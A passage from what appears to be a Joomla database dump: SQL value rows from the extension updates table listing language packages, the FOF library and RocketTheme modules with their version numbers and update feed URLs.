Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(509,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(510,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(511,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(512,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(513,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(514,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(515,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(516,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(517,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(518,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.3','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3033',''),(519,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(520,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(521,3,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(522,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(523,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(524,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(525,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(526,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(527,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(528,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(529,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(530,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(531,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(532,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(533,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(534,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(535,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(537,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(538,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(539,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(540,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(541,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(542,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(543,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(544,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(545,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(546,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(547,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(548,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(549,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(550,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(551,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(552,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(553,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(554,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(555,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(556,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(557,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(558,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(559,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(560,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(561,57,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(562,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(563,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(564,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(565,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(566,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(567,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(568,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(569,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(570,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(571,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(572,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(573,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(574,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(575,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(576,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(577,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(578,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(579,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(580,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(581,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(582,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(583,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(584,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(585,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(586,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(587,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(588,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(589,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(590,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(591,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(592,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(593,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(594,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(595,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.3','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3033',''),(596,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(597,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(598,3,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(599,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(600,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(601,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(602,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(603,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(604,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(605,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(606,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(607,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(608,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(609,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(610,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(611,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(612,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(613,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(614,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(615,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(616,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(617,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(618,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(619,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(620,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(621,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(622,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(623,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(624,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(625,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(626,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(627,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(628,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(629,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(630,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(631,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(632,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(633,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(634,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(635,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(636,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(637,57,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(638,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(639,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(640,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(641,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(642,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(643,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(644,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(645,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(646,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(647,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(648,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(649,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(650,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(651,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(652,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(653,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(654,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(655,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(656,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(657,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(658,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(659,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(660,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(661,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(662,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(663,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(664,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(665,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(666,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(667,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(668,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(669,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(670,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(671,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.3','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3033',''),(672,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(673,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(674,3,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(675,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(676,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(677,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(678,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(679,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(680,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(681,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(682,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(683,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(684,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(685,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(686,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(687,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(688,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(689,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(690,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(691,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(692,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(693,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(694,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(695,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(696,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(697,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(698,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(699,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(700,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(701,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(702,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(703,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(704,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(705,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(706,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(707,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(708,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(709,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(710,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(711,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(712,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(713,57,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(714,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(715,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(716,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(717,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(718,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(719,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(720,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(721,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(722,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(723,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(724,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(725,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(726,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(727,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(728,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-S